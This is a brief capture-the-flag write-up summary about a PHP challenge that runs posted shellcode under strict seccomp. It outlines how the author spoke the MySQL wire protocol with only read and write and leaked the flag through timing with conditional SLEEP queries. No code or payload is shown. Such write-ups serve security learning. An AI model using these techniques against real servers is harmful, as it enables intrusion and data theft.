The challenge consists of a simple PHP script that opens a MySQL connection and then feeds our input into a custom PHP extension `shellme.so`.

The extension basically just executes `$_POST['shell']` as shellcode after a strict SECCOMP call, [prctl](http://man7.org/linux/man-pages/man2/prctl.2.html)([22](https://elixir.bootlin.com/linux/v4.16.8/source/include/uapi/linux/prctl.h#L68), [1](https://elixir.bootlin.com/linux/v4.1/source/include/uapi/linux/seccomp.h#L10)). This means that we can only use the four syscalls `read`, `write`, and `exit`, and `sigreturn`, where the latter two aren't particularly useful.

The goal is to read the flag from the open MySQL connection. To implement this in shellcode, we need to do a little digging into the MySQL documentation to figure out how the [client/server protocol](https://dev.mysql.com/doc/dev/mysql-server/latest/PAGE_PROTOCOL.html) works. Unfortunately, the server kept giving 500 errors, so I was unable to let it write the flag straight back to me; instead, I wrote a SQL query that conditionally called `SLEEP` and leaked the flag via timing.

Read the full writeup below: